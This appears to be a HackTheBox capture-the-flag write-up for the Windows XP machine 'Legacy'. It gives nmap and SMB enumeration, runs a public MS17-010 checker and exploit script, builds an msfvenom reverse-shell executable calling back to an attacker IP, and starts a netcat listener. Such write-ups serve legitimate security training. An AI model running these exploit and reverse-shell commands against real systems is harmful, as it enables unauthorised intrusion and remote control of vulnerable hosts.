Legacy

10.10.10.4

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.4 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

135,139,445

let's run a more in-depth scan of these ports

sudo nmap -sCV -p135,139,445 10.10.10.4 -oA nmap_results

results

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-19 07:17 EST
Nmap scan report for 10.10.10.4
Host is up (0.025s latency).

PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  ▒           Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-12-24T16:15:43+02:00
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4b:1c (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m50s, median: 4d23h57m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.95 seconds

Looks like we are dealing with a old windows machine Windows XP This should be fun

Lets start with SMB

lets check for anonymous authentication

crackmapexec smb 10.10.10.4 -u anonymous -p ''

After some quick googling, we can see our target is vulnerable to MS08-67 and MS17-010, with this knowledge lets see if we can exploit the target

Lets download the following git repo

https://github.com/worawit/MS17-010.git

to confirm our suspicions we can run the checker.py against the target to see if it is indeed vulnerable

python2 checker.py 10.10.10.4

which it is indeed

Now we just need to exploit the target

python2 zzz_exploit.py 10.10.10.4

Now lets create our own reverse shell that will be placed on the target and listen to the incoming call to establish a shell

Lets create a reverse shell script

msfvenom -p windows/shell_reverse_tcp -f exe-service lhost=10.10.14.6 lport=9001 -o shrek123.exe

Now start a nc listener

rlwrap -cAr nc -lvnp 9001

Lets upload and execute the file on the target system

PreviousOptimum HTB NextJerry HTB

Last updated 2 years ago